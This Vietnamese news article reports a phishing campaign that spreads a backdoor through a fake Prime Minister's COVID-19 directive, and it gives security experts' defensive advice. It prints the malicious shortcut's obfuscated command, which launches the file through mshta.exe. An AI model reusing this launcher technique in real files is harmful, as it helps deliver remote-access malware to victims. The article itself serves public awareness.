Thứ 2, ngày 8 tháng 3 năm 2021
Email mạo danh thông báo của Thủ tướng về dịch COVID-19 để phát tán mã độc
TTO - Mã độc được chèn trong một tệp văn bản với tiêu đề "Chi thi cua Thu tuong Nguyen Xuan Phuc" nhằm đánh lừa người dùng. Mẫu mã độc này mới được thu thập được qua hệ thống CMC Threat Intelligence.

Mã độc được phát tán qua email giả dạng thông báo của Thủ tướng Chính phủ về dịch COVID-19
Cụ thể, theo phân tích của Công ty CMC Cyber Security, file mẫu là một file shortcut có phần mở rộng là ".lnk" được ẩn dưới dạng một file Word nhằm đánh lừa người dùng do đuôi ".lnk" sẽ được hệ điều hành Windows ẩn đi.
Tuy nhiên, theo các chuyên gia, file Word này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: "%comspec% /c for %x in (%temp%=%cd%) do for /f "delims==" %i in (‘dir "%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b’) do start m%windir:~-1,1%hta.exe "%i" .
Các chuyên gia CMC Cyber Security cho biết sau khi lừa người dùng tải về, qua hàng loạt lệnh, mã độc sẽ có thể tạo backdoor (cửa hậu) cho phép kẻ tấn công thực thi lệnh từ xa; hay hỗ trợ nhiều lệnh thực thi khác nhau bao gồm upload file, thư mục, list folder, đọc file, lấy thông tin máy tính, thông tin người dùng…
"Hiện tượng lợi dụng các nội dung, thông tin nhạy cảm để phát tán mã độc đã, đang diễn ra hằng ngày không chỉ riêng các thông tin về COVID-19 mà còn nhiều thông tin khác. Nếu người dùng không cẩn thận khi click, mở các file chứa mã độc, người dùng có thể bị mất các thông tin cá nhân, ngoài ra các hacker có thể lợi dụng tài khoản lấy được của người dùng để lan truyền tin tức giả, phát tán mã độc", chuyên gia bảo mật cảnh báo.
"Trường hợp bắt buộc phải tải file về nhưng thấy có nghi ngờ về nội dung hoặc người gửi thì người dùng cần chuyển tiếp email đó vào một email tạm thời khác và dùng một máy khác, tách biệt khỏi mạng đang làm việc để mở file. Nếu nắm về kỹ thuật hơn nữa thì có thể thử mở các file nghi ngờ tại các môi trường an toàn hơn (như máy ảo)", chuyên giao bảo mật lưu ý thêm.
-
TTO - Sáng 8-3, anh Nguyễn Văn Lộc, người trong clip dừng xe đột ngột va quẹt xe Mercedes trên cầu Bình Phước 2, đã nhận xe máy mới từ anh Huỳnh Bảo Toàn (chủ xe) và bộc bạch những câu chuyện khiến người nghe không khỏi chạnh lòng.
-
TTO - Văn phòng Cơ quan cảnh sát điều tra, Bộ Công an đề nghị Sở Tư pháp TP.HCM chỉ đạo rà soát, cung cấp tài liệu là các hợp đồng công chứng ở TP.HCM từ 1-1-2018 đến nay của cha con ông Trần Quí Thanh và nhiều cá nhân phục vụ điều tra.
-
TTO - Sáng 8-3, những mũi tiêm vắc xin ngừa COVID-19 đã được tiêm đồng loạt tại các điểm ở TP.HCM, Hà Nội và Hải Dương. Nhân Ngày Quốc tế phụ nữ, những người được tiêm đầu tiên đều là nữ nhân viên y tế.
-
TTO - Người đàn ông khốn khổ đứng trước 'vành móng ngựa' chờ xét xử tội giết người. Phát hiện vợ mình ngoại tình với người bạn thân, Sang đã dùng dao đâm 2 nhát. Sang vào tù bỏ 3 con trẻ bơ vơ.
-
TP.HCM bắt đầu có nắng nóng kéo dài, dẫn đến nhu cầu sử dụng điện làm mát của người dân đang tăng mạnh. Tổng công ty Điện lực TP.HCM (EVNHCMC) dự báo hóa đơn tiền điện các tháng mùa khô có thể tăng đột biến.
Hiện chưa có bình luận nào, hãy là người đầu tiên bình luận
Xem thêm bình luận